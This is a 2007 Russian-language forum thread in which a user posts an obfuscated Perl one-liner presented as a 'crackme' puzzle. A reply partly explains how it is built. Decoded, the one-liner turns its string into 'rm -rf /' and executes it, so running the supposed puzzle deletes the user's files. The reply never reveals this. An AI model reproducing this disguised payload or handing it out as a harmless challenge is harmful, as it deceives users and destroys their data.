Perl crackme #2

Discussion in 'PHP' started by KSURi, 23 Nov 2007.

  1. KSURi

    KSURi tnega AOLPS

    Joined:
    6 Jun 2006
    Messages:
    458
    Likes Received:
    219
    Reputations:
    357
    Code:
    s;;<-|}<&|`;;y; -/:-@[-`{-};`-{/" -;;`$_`
    В код встроена защита от взлома ;)

    PS: UNIX ONLY
     
    5 people like this.
  2. genom--

    genom-- Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    668
    Likes Received:
    416
    Reputations:
    288
    чет я позно заметил топик -- а че только никсы =( -- лан ща с витруальки поковыряюсь -- сам хотел ченить написать в ближайшем времени да все некогда -- о итогах доложусь )))))

    ну порылся вот заметки

    s;;<-|}<&|`;; # s;;<-|}<&|`;;
    print "$_\n"; # на выходе получаем <-|}<&|`в переменной $_ -- это совсем просто -- по дефолту через s заменили пустоту в ней на этот текст - а ; выступает в качестве ограничителей(кто хорошо читал учебники знает что в качестве ограничителей могут выступать многие парные символы)
    y; -/:-@;;; # y; -/:-@[-`{-};`-{/" -;; ну а тут уже практически классический прием в джарпах перексориваются они друга на друга в процессе замены
    # например -/:-@ это наша < которая первый символ и потом станет буквой r ну и остальные так далее -- не буду говорить что доконца понял методику ксора в замене - но скажу что она мне сильно и не интересна - я думаю что знать это не так уж и важно
    print $_

    такаяже фича у диджимортала была в джарпе -- кста у него даж походу валяется скрипт который генерирует эти последовательности - так что не оч интересно было - но серавно молодец
     
    #2 genom--, 24 Nov 2007
    Last edited: 24 Nov 2007